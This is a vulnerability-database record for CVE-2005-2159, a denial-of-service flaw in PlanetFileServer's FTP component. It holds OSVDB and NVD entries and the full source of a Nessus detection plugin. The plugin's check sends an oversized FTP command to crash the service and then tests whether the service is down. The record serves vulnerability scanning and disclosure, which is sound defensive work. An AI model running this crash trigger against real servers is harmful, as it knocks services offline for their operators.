{"edition": 1, "title": "PlanetFileServer mshftp.dll Data Processing Remote DoS", "bulletinFamily": "software", "published": "2005-07-04T03:10:16", "lastseen": "2017-04-28T13:20:14", "history": [], "modified": "2005-07-04T03:10:16", "reporter": "OSVDB", "hash": "58d7c9be24f255e4f16d11b2e712697b80282281e6a44bd87ca5b3c18edbec9c", "viewCount": 0, "href": "https://vulners.com/osvdb/OSVDB:17820", "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.planetdns.net/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-07/0031.html\n[CVE-2005-2159](https://vulners.com/cve/CVE-2005-2159)\n", "affectedSoftware": [], "type": "osvdb", "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "2ed8b20fdb4c41e6c2baae4e7958a112"}, {"key": "cvss", "hash": "84813b1457b92d6ba1174abffbb83a2f"}, {"key": "description", "hash": "8cda1c8ae9a99b3f2144d6ee56fdf1ea"}, {"key": "href", "hash": "58f052e54964a24febf58d0ee1c9d298"}, {"key": "modified", "hash": "85fbcd784fec954eb31628d5c44e5341"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "85fbcd784fec954eb31628d5c44e5341"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "955b328dc7cd615c13af5464c9183464"}, {"key": "title", "hash": "3a65d0a0263ea8e39744299fa27cbce0"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}], "references": [], "objectVersion": "1.2", "enchantments": {"score": {"vector": "NONE", "value": 5.0}, "vulnersScore": 5.0}, "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/", "score": 5.0}, "cvelist": ["CVE-2005-2159"], "id": "OSVDB:17820"}

{"cve": [{"lastseen": "2017-04-18T15:51:18", "references": ["http://marc.info/?l=bugtraq&m=112051398718830&w=2", "http://www.securityfocus.com/bid/14138"], "description": "mshftp.dll in PlanetDNS PlanetFileServer 2.0.1.3 allows remote attackers to cause a denial of service (application crash) via a long request.", "edition": 2, "reporter": "NVD", "published": "2005-07-06T00:00:00", "title": "CVE-2005-2159", "type": "cve", "enchantments": {"score": {"modified": "2017-04-18T15:51:18", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2005-2159"], "scanner": [], "modified": "2016-10-17T23:25:17", "cpe": ["cpe:/a:planetdns:planetfileserver:2.0.1.3"], "id": "CVE-2005-2159", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2159", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "nessus": [{"lastseen": "2018-09-01T23:59:38", "references": ["http://www.securityfocus.com/archive/1/404161/30/0/threaded"], "pluginID": "18611", "description": "The remote host appears to be running PlanetFileServer, an FTP server for Windows from PlanetDNS. \n\nThe installed version of PlanetFileServer is vulnerable to a buffer overflow when processing large commands. An unauthenticated attacker can trigger this flaw to crash the service or execute arbitrary code as administrator.", "edition": 4, "reporter": "Tenable", "published": "2005-07-05T00:00:00", "title": "PlanetFileServer mshftp.dll Data Processing Remote Overflow", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "FTP", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-2159"], "modified": "2018-07-24T00:00:00", "cpe": [], "id": "PLANETFILESERVER_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=18611", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description) {\n script_id(18611);\n script_version(\"1.18\");\n\n script_cve_id(\"CVE-2005-2159\");\n script_bugtraq_id(14138);\n\n script_name(english:\"PlanetFileServer mshftp.dll Data Processing Remote Overflow\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FTP server is prone to a buffer overflow attack.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host appears to be running PlanetFileServer, an FTP server\nfor Windows from PlanetDNS. \n\nThe installed version of PlanetFileServer is vulnerable to a buffer\noverflow when processing large commands. An unauthenticated attacker\ncan trigger this flaw to crash the service or execute arbitrary code\nas administrator.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/404161/30/0/threaded\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Unknown at this time.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/07/05\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/07/04\");\n script_cvs_date(\"Date: 2018/07/24 18:56:11\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n script_summary(english:\"Checks for remote buffer overflow vulnerability in PlanetFileServer\");\n script_category(ACT_DENIAL);\n script_family(english:\"FTP\");\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_dependencie(\"ftpserver_detect_type_nd_version.nasl\", \"ftp_overflow.nasl\");\n script_exclude_keys(\"ftp/msftpd\", \"ftp/ncftpd\", \"ftp/fw1ftpd\", \"ftp/vxftpd\");\n script_require_ports(\"Services/ftp\", 21);\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"ftp_func.inc\");\n\n\nport = get_ftp_port(default: 21);\n\n\n# If the banner suggests it's for PlanetFileServer...\nbanner = get_ftp_banner(port: port);\nif (! banner) exit(1, \"No FTP banner on port \"+port+\".\");\nif (\n egrep(string:banner, pattern:\"^220[ -]mshftp/.+ NewAce Corporation\")\n) {\n c = crap(135000) + '\\r\\n';\n\n # nb: fRoGGz claims you may need to send the command 2 times\n # depending on the configured security filter option levels.\n i = 0;\n while((soc = open_sock_tcp(port)) && i++ < 2) {\n # Send a long command.\n send(socket:soc, data:c);\n close(soc);\n sleep(1);\n }\n\n # There's a problem if we can't open a connection after sending \n # the exploit at least once.\n if (i > 0) {\n if (service_is_dead(port: port) > 0)\n security_hole(port);\n exit(0);\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}]}